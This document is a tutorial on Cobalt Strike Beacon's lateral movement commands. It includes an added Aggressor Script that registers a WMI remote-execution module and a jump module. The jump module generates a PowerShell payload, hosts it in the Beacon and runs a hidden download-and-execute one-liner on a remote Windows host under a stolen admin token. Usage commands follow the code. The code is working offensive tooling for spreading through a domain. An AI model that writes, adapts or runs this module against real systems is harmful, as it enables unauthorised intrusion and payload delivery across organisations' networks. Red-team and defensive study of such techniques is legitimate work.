Cobalt Strike Lateral Movement Modules
Once you have a token for a domain admin or a domain user who is a local admin on a target, you may abuse this trust relationship to get control of the target. Cobalt Strike’s Beacon has several built-in options for lateral movement.
Jump Modules
Type jump to list lateral movement options registered with Cobalt Strike. Run jump [module] [target] [listener] to attempt to run a payload on a remote target.
1) psexec (Use a service to run a Service EXE artifact) (x86 arch)
2) psexec64 (Use a service to run a Service EXE artifact) (x64 arch)
3) psexec_psh (Use a service to run a Powershell one-liner) (x86 arch)
4) winrm (Run a Powershell script via WinRM) (x86 arch)
5) winrm64 (Run a Powershell script via WinRM) (x64 arch)
Remote-exec Modules
Run remote-exec, by itself, to list remote execution modules registered with Cobalt Strike. Use remote-exec [module] [target] [command + args] to attempt to run the specified command on a remote target.
1) psexec (Remote execute via Service Control Manager)
2) winrm (Remote execute via WinRM using powershell)
3) wmi (Remote execute via WMI)
Lateral movement, like privilege escalation, is an area where some attacks present a natural set of primitives to spawn a session on a remote target, while others give you an execute primitive only. The split between jump and remote-exec gives you the flexibility to decide how to weaponize an execute-only primitive: jump delivers a payload for a listener, remote-exec runs an arbitrary command.
Aggressor Script has an API to add new modules to jump and remote-exec.
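The following Aggressor Script is an added example, not code from the Cobalt Strike manual or from its bundled default.cna. It registers an execute-only primitive with remote-exec and then reuses that primitive from a jump module, which is the weaponization pattern described above. The registration functions (beacon_remote_exec_method_register, beacon_jump_register) and helpers (btask, bshell!, artifact_payload, beacon_host_script, listener_describe) are Aggressor Script API calls as documented for Cobalt Strike; the wmic-based implementation, the module names ending in _example (chosen so they do not shadow the built-in wmi module), and the task messages are this example's own assumptions.

```sleep
# Added example, not Cobalt Strike's own code: a WMI execute-only primitive
# registered with remote-exec, reused by a jump module for payload delivery.
# The wmic command line and the "_example" module names are assumptions.

# Shared helper: run $cmd on $target through WMI from Beacon $bid.
# Win32_Process.Create on the remote host runs in the context of
# whatever token this Beacon currently holds.
sub wmi_exec_cmd {
    local('$bid $target $cmd');
    ($bid, $target, $cmd) = @_;
    # bshell! is the quiet form of bshell: no extra task acknowledgement
    bshell!($bid, 'wmic /node:"' . $target . '" process call create "' . $cmd . '"');
}

# remote-exec callback: $1 = beacon id, $2 = target, $3 = command + args
sub wmi_remote_exec {
    # T1047 is the MITRE ATT&CK id for Windows Management Instrumentation
    btask($1, 'Tasked Beacon to run "' . $3 . '" on ' . $2 . ' via WMI', "T1047");
    wmi_exec_cmd($1, $2, $3);
}

# jump callback: $1 = beacon id, $2 = target, $3 = listener name
sub wmi_jump {
    local('$script $oneliner');
    btask($1, "Tasked Beacon to run " . listener_describe($3) . " on " . $2 . " via WMI", "T1047");

    # stageless PowerShell payload for the chosen listener
    $script = artifact_payload($3, "powershell", "x64");

    # host the script inside this Beacon; the return value is a short
    # one-liner that downloads and runs it
    $oneliner = beacon_host_script($1, $script);

    # weaponize the execute-only primitive: hand the one-liner to WMI
    wmi_exec_cmd($1, $2, "powershell -nop -w hidden -c " . $oneliner);
}

# Register both modules. Names with an _example suffix avoid colliding
# with the built-in wmi remote-exec module.
beacon_remote_exec_method_register("wmi_example",
    "Remote execute via WMI (wmic)", &wmi_remote_exec);
beacon_jump_register("wmi_example", "x64",
    "Run a PowerShell script via WMI (wmic)", &wmi_jump);
```

After loading the script through the Script Manager, jump and remote-exec list the new entries. remote-exec wmi_example [target] whoami exercises the primitive on its own; jump wmi_example [target] [listener] chains a listener's payload through it. Both run under the token the Beacon currently holds, so they require the local admin trust relationship described at the top of this page.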